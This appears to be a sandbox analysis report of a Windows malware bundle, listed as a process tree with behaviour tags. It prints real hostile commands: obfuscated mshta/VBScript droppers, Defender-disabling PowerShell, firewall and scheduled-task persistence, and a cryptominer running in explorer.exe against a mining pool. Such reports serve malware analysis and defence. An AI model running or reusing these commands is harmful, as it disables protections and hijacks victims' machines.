C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R typE "C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF "/PsV~zGbxsNCn0ht2 " == "" for %i in ("C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE" ) do taskkill /IM "%~nXi" /f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScriPT: CLOSe ( CrEateoBJEcT ("wscRIPt.shElL"). ruN( "CMd /c eCHO i2l%dAte%xMAM> 5104y14.R4 & ecHO | SEt /P = ""MZ"" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP + 5104y14.R4 ..\3U_2.OI & deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI " , 0 , TRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHO i2lÚte%xMAM> 5104y14.R4 & ecHO | SEt /P = "MZ" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP + 5104y14.R4 ..\3U_2.OI & deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>QDV9E5X.S"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\3U_2.OI11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Mon11c267c861c0984e.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11cd46e0d889458.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11cd46e0d889458.exeMon11cd46e0d889458.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\8070241.exe"C:\ProgramData\8070241.exe"8⤵
-
C:\ProgramData\1355166.exe"C:\ProgramData\1355166.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\6169518.exe"C:\ProgramData\6169518.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\1715481.exe"C:\ProgramData\1715481.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Pro.exe"C:\Users\Admin\AppData\Local\Temp\Pro.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-HCI1T.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HCI1T.tmp\setup.tmp" /SL5="$20264,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GO73C.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GO73C.tmp\setup.tmp" /SL5="$10422,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-R02EC.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-R02EC.tmp\postback.exe" ss111⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5232 -s 16968⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\EASS.exe"C:\Users\Admin\AppData\Local\Temp\EASS.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EASS.exe"C:\Users\Admin\AppData\Local\Temp\EASS.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 10529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\9.exe"C:\Users\Admin\AppData\Local\Temp\9.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11a22bde2b.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11a22bde2b.exeMon11a22bde2b.exe /mixone5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 2806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1124e978ea57bf.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1124e978ea57bf.exeMon1124e978ea57bf.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\0knn9mY0l5PQHp4gWsjZSlpS.exe"C:\Users\Admin\Pictures\Adobe Films\0knn9mY0l5PQHp4gWsjZSlpS.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\q1qArhKu7efjajBNmy5h0n8M.exe"C:\Users\Admin\Pictures\Adobe Films\q1qArhKu7efjajBNmy5h0n8M.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\HGnD7vZ80Dldb3sA9NYHS6wO.exe"C:\Users\Admin\Pictures\Adobe Films\HGnD7vZ80Dldb3sA9NYHS6wO.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 2327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\xuxy0m26qkl1ozW_XcqhZr0B.exe"C:\Users\Admin\Pictures\Adobe Films\xuxy0m26qkl1ozW_XcqhZr0B.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\4mulY6HX0OKjNh4y5va_iEdo.exe"C:\Users\Admin\Pictures\Adobe Films\4mulY6HX0OKjNh4y5va_iEdo.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose8⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 08⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 28⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\sbvc.exe"C:\Users\Admin\AppData\Local\Temp\sbvc.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 2327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xWDw4KvnprXoiUalqAVdu3zs.exe"C:\Users\Admin\Pictures\Adobe Films\xWDw4KvnprXoiUalqAVdu3zs.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\agoAaS1E4vcti_WnSeLXTsWt.exe"C:\Users\Admin\Pictures\Adobe Films\agoAaS1E4vcti_WnSeLXTsWt.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\AppData\Roaming\League.exe"C:\Users\Admin\AppData\Roaming\League.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\brLy3TAdoOEVkJuOS7U49MCH.exe"C:\Users\Admin\Pictures\Adobe Films\brLy3TAdoOEVkJuOS7U49MCH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe"C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe"C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 10527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\shHTGmNy_HRzMNn3G5hYc3B7.exe"C:\Users\Admin\Documents\shHTGmNy_HRzMNn3G5hYc3B7.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\MxvrNj70D3P6L2I1AAwfyiBI.exe"C:\Users\Admin\Pictures\Adobe Films\MxvrNj70D3P6L2I1AAwfyiBI.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\tDQQVMK4kh5kC_VXdu6mwGw2.exe"C:\Users\Admin\Pictures\Adobe Films\tDQQVMK4kh5kC_VXdu6mwGw2.exe" /mixtwo8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\K0j8f5iqbfnfHvcNjJcr34Ek.exe"C:\Users\Admin\Pictures\Adobe Films\K0j8f5iqbfnfHvcNjJcr34Ek.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 17529⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\4Uf7hX9wKWamDH8f4X0RB_qb.exe"C:\Users\Admin\Pictures\Adobe Films\4Uf7hX9wKWamDH8f4X0RB_qb.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 2729⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Y9cwGigB6qwOuguftOmpB8FC.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\As_7_fJ9jiliYff_bkd0HLSb.exe"C:\Users\Admin\Pictures\Adobe Films\As_7_fJ9jiliYff_bkd0HLSb.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ugEsHRx54YV5ePchkNJT6lmN.exe"C:\Users\Admin\Pictures\Adobe Films\ugEsHRx54YV5ePchkNJT6lmN.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"10⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2004 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2688 /prefetch:111⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2680 /prefetch:111⤵
-
